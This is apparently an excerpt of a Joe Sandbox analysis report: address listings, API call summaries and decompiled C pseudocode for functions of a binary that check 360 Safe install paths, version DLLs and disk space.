                                                                                                                                                                                          0x00ced86b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced871
                                                                                                                                                                                          0x00ced878
                                                                                                                                                                                          0x00ced882
                                                                                                                                                                                          0x00ced882
                                                                                                                                                                                          0x00ced885
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced88b
                                                                                                                                                                                          0x00ced892
                                                                                                                                                                                          0x00ced89c
                                                                                                                                                                                          0x00ced89c
                                                                                                                                                                                          0x00ced8a1
                                                                                                                                                                                          0x00ced8a7
                                                                                                                                                                                          0x00ced8ac
                                                                                                                                                                                          0x00ced8ad
                                                                                                                                                                                          0x00ced8b1
                                                                                                                                                                                          0x00ced8bb
                                                                                                                                                                                          0x00ced8c0
                                                                                                                                                                                          0x00ced8c4
                                                                                                                                                                                          0x00ced8c9
                                                                                                                                                                                          0x00ced8cd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced8cd
                                                                                                                                                                                          0x00ced894
                                                                                                                                                                                          0x00ced896
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced896
                                                                                                                                                                                          0x00ced87a
                                                                                                                                                                                          0x00ced87c
                                                                                                                                                                                          0x00cedad1
                                                                                                                                                                                          0x00cedad6
                                                                                                                                                                                          0x00cedae5
                                                                                                                                                                                          0x00cedae9
                                                                                                                                                                                          0x00ced72f
                                                                                                                                                                                          0x00ced732
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced732
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced87c
                                                                                                                                                                                          0x00ced82b
                                                                                                                                                                                          0x00ced82e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedac3
                                                                                                                                                                                          0x00cedac3
                                                                                                                                                                                          0x00cedac6
                                                                                                                                                                                          0x00cedac6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedacf
                                                                                                                                                                                          0x00ced713
                                                                                                                                                                                          0x00ced718
                                                                                                                                                                                          0x00ced71e
                                                                                                                                                                                          0x00ced723
                                                                                                                                                                                          0x00ced724
                                                                                                                                                                                          0x00ced728
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced72e
                                                                                                                                                                                          0x00ced6a1
                                                                                                                                                                                          0x00ced6a4
                                                                                                                                                                                          0x00ced6a8
                                                                                                                                                                                          0x00ced6b0
                                                                                                                                                                                          0x00ced6b5
                                                                                                                                                                                          0x00ced6b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced6b9
                                                                                                                                                                                          0x00ced6bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced6bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced6c1
                                                                                                                                                                                          0x00ced6c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced6c8
                                                                                                                                                                                          0x00ced635
                                                                                                                                                                                          0x00ced639
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced63b
                                                                                                                                                                                          0x00ced646
                                                                                                                                                                                          0x00ced649
                                                                                                                                                                                          0x00ced64d
                                                                                                                                                                                          0x00ced652
                                                                                                                                                                                          0x00ced657
                                                                                                                                                                                          0x00ced65a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced65a
                                                                                                                                                                                          0x00ced63d
                                                                                                                                                                                          0x00ced644
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CED587
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,00000044), ref: 00CED5BD
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                            • Part of subcall function 00CE7974: _memset.LIBCMT ref: 00CE79B7
                                                                                                                                                                                            • Part of subcall function 00CE7974: __wsplitpath.LIBCMT ref: 00CE79C4
                                                                                                                                                                                            • Part of subcall function 00CE7974: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,761B5A40), ref: 00CE79F3
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00CED606
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CED621
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,00100000,00000000), ref: 00CED6E9
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,00100000,00000000), ref: 00CED732
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CED785
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,?,00100000,00000000), ref: 00CED79A
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,360\360Safe), ref: 00CED7AC
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CED7E6
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,00100000,00000000,00000000), ref: 00CED857
                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,00100000,00000000,00000000), ref: 00CED8BB
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00CED91E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CED98E
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 00CED9A0
                                                                                                                                                                                          • PathAppendW.SHLWAPI(00000000,360Safe), ref: 00CED9AF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugOutputString$Path$_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountDecrementDiskFreeH_prolog3InterlockedSpaceTick__wsplitpath
                                                                                                                                                                                          • String ID: 360Safe$360\360Safe$400$:\360Safe$Begin Check$Change$Get Disk Space$GetVolumes Failed$Index : %d$return
                                                                                                                                                                                          • API String ID: 1385250038-3440340008
                                                                                                                                                                                          • Opcode ID: 561607c9b7948bc6f9dde7fa89b7650e64c21449e8c6b2fdad257be3c1e60ac9
                                                                                                                                                                                          • Instruction ID: 4b87b739d81c9cf4f0994109db86d6ef2a1f753e6e15e3fb9abb4052c33593eb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 561607c9b7948bc6f9dde7fa89b7650e64c21449e8c6b2fdad257be3c1e60ac9
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1027A7190024AAFCF15EFE5DC46AEEBBB8BF04310F10042AF416A7291EB746A45DB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CECA6B Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 190libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 180 ceca6b-cecad8 call d0155a call d006a0 SHGetValueW 185 cecade-cecae5 180->185 186 cecc9f 180->186 185->186 187 cecaeb-cecaee 185->187 188 cecca1-ceccc3 call d0071a 186->188 187->186 189 cecaf4-cecb2a call c9b6e5 PathCombineW PathFileExistsW 187->189 194 cecb2c-cecb38 call c9820f 189->194 195 cecb3d-cecbbc call c9ccc5 * 2 call d006a0 PathCombineW * 3 call c8e2d0 189->195 194->188 206 cecc44-cecc68 call d006a0 call c8e2d0 195->206 207 cecbc2-cecbd0 call c8e2d0 195->207 217 cecc7c-cecc91 call cec5b1 206->217 218 cecc6a 206->218 207->206 212 cecbd2-cecbe3 call c8e2d0 207->212 212->206 220 cecbe5-cecbec call c8e730 212->220 222 cecc96-cecc9d 217->222 221 cecc6f-cecc77 call c9accc 218->221 226 cecbf1-cecbf6 220->226 221->217 222->221 226->206 227 cecbf8-cecc19 GetProcAddress * 2 226->227 228 cecc1b-cecc2e 227->228 229 cecc33-cecc35 227->229 228->229 234 cecc30 228->234 230 cecc3c-cecc40 229->230 231 cecc37-cecc39 229->231 230->222 233 cecc42 230->233 231->230 233->206 234->229
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00CECA6B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t56;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t90;
				struct HINSTANCE__* _t98;
				struct HINSTANCE__* _t102;
				_Unknown_base(*)()* _t104;
				struct HINSTANCE__* _t107;
				struct HINSTANCE__* _t110;
				void* _t111;
				void* _t137;
				struct HINSTANCE__* _t139;
				struct HINSTANCE__* _t141;
				void* _t143;
				void* _t144;
				WCHAR* _t145;
				void* _t147;

				_t145 = _t147 - 0x604;
				_t56 =  *0xd64070; // 0x8a9e1774
				_t145[0x304] = _t56 ^ _t145;
				_push(0x18);
				E00D0155A(0xd379b1, __ebx, __edi, __esi);
				_t110 = 1;
				_t143 = __ecx;
				 *(_t145 - 0x1c) = 1;
				 *(_t145 - 0x18) = 0x80;
				E00D006A0(0,  &(_t145[0x284]), 0, 0x100);
				_t134 = _t145 - 0x1c;
				SHGetValueW( *(_t143 + 0x58),  *(_t143 + 0x4c),  *(_t143 + 0x50), _t145 - 0x1c,  &(_t145[0x284]), _t145 - 0x18); // executed
				if( *(_t145 - 0x1c) != 1 || _t145[0x284] == 0 ||  *(_t145 - 0x18) <= 0) {
					_t64 = 0;
					__eflags = 0;
					goto L23;
				} else {
					E00C9B6E5(_t145 - 0x10, _t134, _t145,  &(_t145[0x284]));
					 *((intOrPtr*)(_t145 - 4)) = 0;
					PathCombineW( &(_t145[0x284]),  *(_t145 - 0x10),  *(_t143 + 0x54));
					if(PathFileExistsW( &(_t145[0x284])) != 0) {
						 *((intOrPtr*)(_t143 + 0x60)) = 1;
						E00C9CCC5(_t143 + 0x44, _t145, _t145 - 0x10);
						E00C9CCC5(_t143 + 0x48, _t145, _t145 - 0x10);
						_t145[0x180] = 0;
						E00D006A0(PathCombineW,  &(_t145[0x181]), 0, 0x206);
						PathCombineW( &(_t145[0x100]),  *(_t145 - 0x10), L"360ver.dll");
						PathCombineW(_t145,  *(_t145 - 0x10), L"360Common.dll");
						PathCombineW( &(_t145[0x80]),  *(_t145 - 0x10), L"360Base.dll");
						_t139 = 0;
						 *(_t145 - 0x14) = 0;
						_t86 = E00C8E2D0( &(_t145[0x100]), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							L17:
							E00D006A0(_t139,  &(_t145[0x180]), _t139, 0x208);
							_t90 = E00C8E2D0( &(_t145[0x284]), _t139);
							__eflags = _t90;
							if(_t90 != 0) {
								E00CEC5B1(_t110, _t134,  &(_t145[0x284]),  &(_t145[0x180]), 0x104);
								L21:
								_push( &(_t145[0x180]));
								L19:
								E00C9ACCC(_t143 + 0x5c);
								L5:
								E00C9820F(_t145 - 0x10);
								_t64 = _t110;
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t145 - 0xc));
								_pop(_t137);
								_pop(_t144);
								_pop(_t111);
								return E00D0071A(_t64, _t111, _t145[0x304] ^ _t145, _t134, _t137, _t144);
							}
							_push(L"0.0.0.0");
							goto L19;
						}
						_t98 = E00C8E2D0(_t145, 0);
						__eflags = _t98;
						if(_t98 == 0) {
							goto L17;
						}
						__eflags = E00C8E2D0( &(_t145[0x80]), 0);
						if(__eflags == 0) {
							goto L17;
						}
						_t102 = E00C8E730(1, __eflags,  &(_t145[0x100]));
						 *(_t145 - 0x24) = _t102;
						__eflags = _t102;
						if(_t102 == 0) {
							goto L17;
						}
						 *(_t145 - 0x20) = GetProcAddress(_t102, "Get360SafeVersion");
						_t104 = GetProcAddress( *(_t145 - 0x24), "IsBetaVersion");
						__eflags =  *(_t145 - 0x20);
						_t141 = _t104;
						if( *(_t145 - 0x20) != 0) {
							_t107 =  *(_t145 - 0x20)( &(_t145[0x180]), 0x104);
							__eflags = _t107;
							if(_t107 != 0) {
								 *(_t145 - 0x14) = 1;
							}
						}
						__eflags = _t141;
						if(_t141 != 0) {
							 *((intOrPtr*)(_t143 + 0x68)) = _t141->i();
						}
						__eflags =  *(_t145 - 0x14);
						if( *(_t145 - 0x14) != 0) {
							goto L21;
						} else {
							_t139 = 0;
							__eflags = 0;
							goto L17;
						}
					}
					_t110 = 0;
					goto L5;
				}
			}





















                                                                                                                                                                                          0x00ceca72
                                                                                                                                                                                          0x00ceca76
                                                                                                                                                                                          0x00ceca7d
                                                                                                                                                                                          0x00ceca83
                                                                                                                                                                                          0x00ceca8a
                                                                                                                                                                                          0x00ceca9f
                                                                                                                                                                                          0x00cecaa1
                                                                                                                                                                                          0x00cecaa3
                                                                                                                                                                                          0x00cecaa6
                                                                                                                                                                                          0x00cecaad
                                                                                                                                                                                          0x00cecac6
                                                                                                                                                                                          0x00cecacf
                                                                                                                                                                                          0x00cecad8
                                                                                                                                                                                          0x00cecc9f
                                                                                                                                                                                          0x00cecc9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecaf4
                                                                                                                                                                                          0x00cecafe
                                                                                                                                                                                          0x00cecb0f
                                                                                                                                                                                          0x00cecb19
                                                                                                                                                                                          0x00cecb2a
                                                                                                                                                                                          0x00cecb44
                                                                                                                                                                                          0x00cecb47
                                                                                                                                                                                          0x00cecb53
                                                                                                                                                                                          0x00cecb60
                                                                                                                                                                                          0x00cecb6e
                                                                                                                                                                                          0x00cecb85
                                                                                                                                                                                          0x00cecb93
                                                                                                                                                                                          0x00cecba4
                                                                                                                                                                                          0x00cecba6
                                                                                                                                                                                          0x00cecbb0
                                                                                                                                                                                          0x00cecbb3
                                                                                                                                                                                          0x00cecbba
                                                                                                                                                                                          0x00cecbbc
                                                                                                                                                                                          0x00cecc44
                                                                                                                                                                                          0x00cecc51
                                                                                                                                                                                          0x00cecc5e
                                                                                                                                                                                          0x00cecc66
                                                                                                                                                                                          0x00cecc68
                                                                                                                                                                                          0x00cecc91
                                                                                                                                                                                          0x00cecc96
                                                                                                                                                                                          0x00cecc9c
                                                                                                                                                                                          0x00cecc6f
                                                                                                                                                                                          0x00cecc72
                                                                                                                                                                                          0x00cecb2e
                                                                                                                                                                                          0x00cecb31
                                                                                                                                                                                          0x00cecb36
                                                                                                                                                                                          0x00cecca1
                                                                                                                                                                                          0x00cecca4
                                                                                                                                                                                          0x00ceccac
                                                                                                                                                                                          0x00ceccad
                                                                                                                                                                                          0x00ceccae
                                                                                                                                                                                          0x00ceccc3
                                                                                                                                                                                          0x00ceccc3
                                                                                                                                                                                          0x00cecc6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecc6a
                                                                                                                                                                                          0x00cecbc7
                                                                                                                                                                                          0x00cecbce
                                                                                                                                                                                          0x00cecbd0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecbe1
                                                                                                                                                                                          0x00cecbe3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecbec
                                                                                                                                                                                          0x00cecbf1
                                                                                                                                                                                          0x00cecbf4
                                                                                                                                                                                          0x00cecbf6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecc0e
                                                                                                                                                                                          0x00cecc11
                                                                                                                                                                                          0x00cecc13
                                                                                                                                                                                          0x00cecc17
                                                                                                                                                                                          0x00cecc19
                                                                                                                                                                                          0x00cecc27
                                                                                                                                                                                          0x00cecc2c
                                                                                                                                                                                          0x00cecc2e
                                                                                                                                                                                          0x00cecc30
                                                                                                                                                                                          0x00cecc30
                                                                                                                                                                                          0x00cecc2e
                                                                                                                                                                                          0x00cecc33
                                                                                                                                                                                          0x00cecc35
                                                                                                                                                                                          0x00cecc39
                                                                                                                                                                                          0x00cecc39
                                                                                                                                                                                          0x00cecc3c
                                                                                                                                                                                          0x00cecc40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecc42
                                                                                                                                                                                          0x00cecc42
                                                                                                                                                                                          0x00cecc42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecc42
                                                                                                                                                                                          0x00cecc40
                                                                                                                                                                                          0x00cecb2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cecb2c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CECA8A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CECAAD
                                                                                                                                                                                          • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 00CECACF
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 00CECB19
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00CECB22
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CECB6E
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 00CECB85
                                                                                                                                                                                          • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 00CECB93
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 00CECBA4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 00CECC04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 00CECC11
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CECC51
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$Combine$_memset$AddressProc$DecrementExistsFileH_prolog3InterlockedValue
                                                                                                                                                                                          • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                                          • API String ID: 750974709-96710800
                                                                                                                                                                                          • Opcode ID: 2aea87f53f1f8bfde62c9306dfb7ea031d03cc653a0da3a40b9266b525bb312a
                                                                                                                                                                                          • Instruction ID: ed56d6a5b5fd70def96e5fe1931dec122fedd832dbc39e08ac83c7245bc43443
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aea87f53f1f8bfde62c9306dfb7ea031d03cc653a0da3a40b9266b525bb312a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25617E7690068DAFDB20EFA5CC85EEF77B9FB48300F50042AE559D7181EB74A605DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEDB29 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 197fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E00CEDB29(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t68;
				WCHAR* _t72;
				WCHAR* _t82;
				signed int _t83;
				void* _t103;
				void* _t104;
				void* _t112;
				void* _t117;
				void* _t120;
				int _t121;
				void* _t123;
				WCHAR* _t124;
				void* _t131;
				void* _t139;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				char* _t177;
				signed int _t178;
				void* _t180;
				void* _t185;

				_t185 = __eflags;
				_t170 = __edx;
				_t178 = _t180 - 0x204;
				_t68 =  *0xd64070; // 0x8a9e1774
				 *(_t178 + 0x208) = _t68 ^ _t178;
				_push(0x18);
				E00D0155A(0xd37d49, __ebx, __edi, __esi);
				_t72 =  *0xd5d01c; // 0xd5d014
				_t172 = __ecx;
				 *(_t178 - 0x20) = _t72;
				 *((intOrPtr*)(_t178 - 4)) = 0;
				E00C9ACF3(0, _t178 - 0x20, __edx, _t185, 0x9d); // executed
				_push( *(_t178 - 0x20));
				E00D032A3();
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x48)) - 8)) == 0) {
					E00D006A0(__ecx, _t178, 0, 0x208);
					_t82 =  *0xd5d01c; // 0xd5d014
					 *(_t178 - 0x10) = _t82;
					_t83 = _t178;
					 *((char*)(_t178 - 4)) = 1;
					__imp__SHGetSpecialFolderPathW(0, _t83, 0x26, 0); // executed
					if(_t83 != 0) {
						_t190 =  *((intOrPtr*)(_t172 + 0x60));
						if( *((intOrPtr*)(_t172 + 0x60)) == 0) {
							_t120 = E00CEC0CF(0, _t190); // executed
							if(_t120 == 0) {
								_t121 = PathIsDirectoryW( *(_t178 - 0x10)); // executed
								if(_t121 != 0 && PathIsDirectoryEmptyW( *(_t178 - 0x10)) == 0) {
									_push( *(_t178 - 0x10));
									_t123 = E00CE31FB(_t170, _t172, _t176);
									_t194 = _t123;
									if(_t123 == 0) {
										_t124 =  *0xd5d01c; // 0xd5d014
										 *(_t178 - 0x14) = _t124;
										 *((char*)(_t178 - 4)) = 3;
										E00C9D261(_t178 - 0x14, 0xd3e510, GetTickCount());
										_push(_t178 - 0x14);
										_push(_t178 - 0x10);
										_push(_t178 - 0x18);
										_t131 = E00CA701F(0, _t170, _t172, _t176, _t194);
										 *((char*)(_t178 - 4)) = 4;
										E00C9CCC5(_t178 - 0x10, _t178, _t131);
										E00C9820F(_t178 - 0x18);
										 *((char*)(_t178 - 4)) = 2;
										E00C9820F(_t178 - 0x14);
									}
								}
							}
						}
						E00CED568(0, _t172, _t170, _t172, _t176, _t194, _t178 - 0x10);
						_t177 = L"\\360Safe";
						E00C9B6E5(_t178 - 0x14, _t170, _t178, _t177);
						_push( *((intOrPtr*)( *(_t178 - 0x14) - 8)));
						_push(_t178 - 0x1c);
						 *((char*)(_t178 - 4)) = 5;
						E00CA6FC8(0, _t178 - 0x10, _t172, _t177, _t194);
						 *((char*)(_t178 - 4)) = 6;
						E00C998FD(0, _t178 - 0x1c, _t170);
						CharUpperW( *(_t178 - 0x1c));
						E00C998FD(CharUpperW, _t178 - 0x14, _t170);
						CharUpperW( *(_t178 - 0x14));
						_t103 = E00CDCED8(_t178 - 0x1c, _t178 - 0x14);
						_t195 = _t103;
						_t104 = _t178 - 0x10;
						if(_t103 == 0) {
							E00C9CCC5(_t172 + 0x48, _t178, _t104);
							E00C9CCC5(_t172 + 0x44, _t178, _t178 - 0x10);
						} else {
							_push(_t177);
							_push(_t104);
							_push(_t178 - 0x18);
							_t112 = E00C9B7F5(CharUpperW, _t170, _t172, _t177, _t195);
							 *((char*)(_t178 - 4)) = 7;
							E00C9CCC5(_t172 + 0x48, _t178, _t112);
							 *((char*)(_t178 - 4)) = 6;
							E00C9820F(_t178 - 0x18);
							_push(_t177);
							_push(_t178 - 0x10);
							_push(_t178 - 0x18);
							_t117 = E00C9B7F5(CharUpperW, _t170, _t172, _t177, _t195);
							 *((char*)(_t178 - 4)) = 8;
							E00C9CCC5(_t172 + 0x44, _t178, _t117);
							E00C9820F(_t178 - 0x18);
						}
						E00C9820F(_t178 - 0x1c);
						E00C9820F(_t178 - 0x14);
						E00C9820F(_t178 - 0x24);
					}
					E00C9820F(_t178 - 0x10);
				}
				E00C9820F(_t178 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t178 - 0xc));
				_pop(_t173);
				_pop(_t175);
				_pop(_t139);
				return E00D0071A(1, _t139,  *(_t178 + 0x208) ^ _t178, _t170, _t173, _t175);
			}


























                                                                                                                                                                                          0x00cedb29
                                                                                                                                                                                          0x00cedb29
                                                                                                                                                                                          0x00cedb30
                                                                                                                                                                                          0x00cedb34
                                                                                                                                                                                          0x00cedb3b
                                                                                                                                                                                          0x00cedb41
                                                                                                                                                                                          0x00cedb48
                                                                                                                                                                                          0x00cedb4d
                                                                                                                                                                                          0x00cedb52
                                                                                                                                                                                          0x00cedb54
                                                                                                                                                                                          0x00cedb61
                                                                                                                                                                                          0x00cedb64
                                                                                                                                                                                          0x00cedb69
                                                                                                                                                                                          0x00cedb6c
                                                                                                                                                                                          0x00cedb78
                                                                                                                                                                                          0x00cedb88
                                                                                                                                                                                          0x00cedb8d
                                                                                                                                                                                          0x00cedb95
                                                                                                                                                                                          0x00cedb9b
                                                                                                                                                                                          0x00cedba0
                                                                                                                                                                                          0x00cedba4
                                                                                                                                                                                          0x00cedbac
                                                                                                                                                                                          0x00cedc02
                                                                                                                                                                                          0x00cedc05
                                                                                                                                                                                          0x00cedc0b
                                                                                                                                                                                          0x00cedc12
                                                                                                                                                                                          0x00cedc17
                                                                                                                                                                                          0x00cedc1b
                                                                                                                                                                                          0x00cedc2a
                                                                                                                                                                                          0x00cedc2d
                                                                                                                                                                                          0x00cedc33
                                                                                                                                                                                          0x00cedc35
                                                                                                                                                                                          0x00cedc37
                                                                                                                                                                                          0x00cedc3c
                                                                                                                                                                                          0x00cedc3f
                                                                                                                                                                                          0x00cedc53
                                                                                                                                                                                          0x00cedc5e
                                                                                                                                                                                          0x00cedc62
                                                                                                                                                                                          0x00cedc66
                                                                                                                                                                                          0x00cedc67
                                                                                                                                                                                          0x00cedc70
                                                                                                                                                                                          0x00cedc74
                                                                                                                                                                                          0x00cedc7c
                                                                                                                                                                                          0x00cedc84
                                                                                                                                                                                          0x00cedc88
                                                                                                                                                                                          0x00cedc88
                                                                                                                                                                                          0x00cedc35
                                                                                                                                                                                          0x00cedc1b
                                                                                                                                                                                          0x00cedc12
                                                                                                                                                                                          0x00cedc93
                                                                                                                                                                                          0x00cedc98
                                                                                                                                                                                          0x00cedca1
                                                                                                                                                                                          0x00cedca9
                                                                                                                                                                                          0x00cedcaf
                                                                                                                                                                                          0x00cedcb3
                                                                                                                                                                                          0x00cedcb7
                                                                                                                                                                                          0x00cedcbf
                                                                                                                                                                                          0x00cedcc3
                                                                                                                                                                                          0x00cedcd1
                                                                                                                                                                                          0x00cedcd6
                                                                                                                                                                                          0x00cedcde
                                                                                                                                                                                          0x00cedce8
                                                                                                                                                                                          0x00cedced
                                                                                                                                                                                          0x00cedcef
                                                                                                                                                                                          0x00cedcf2
                                                                                                                                                                                          0x00cedd41
                                                                                                                                                                                          0x00cedd4d
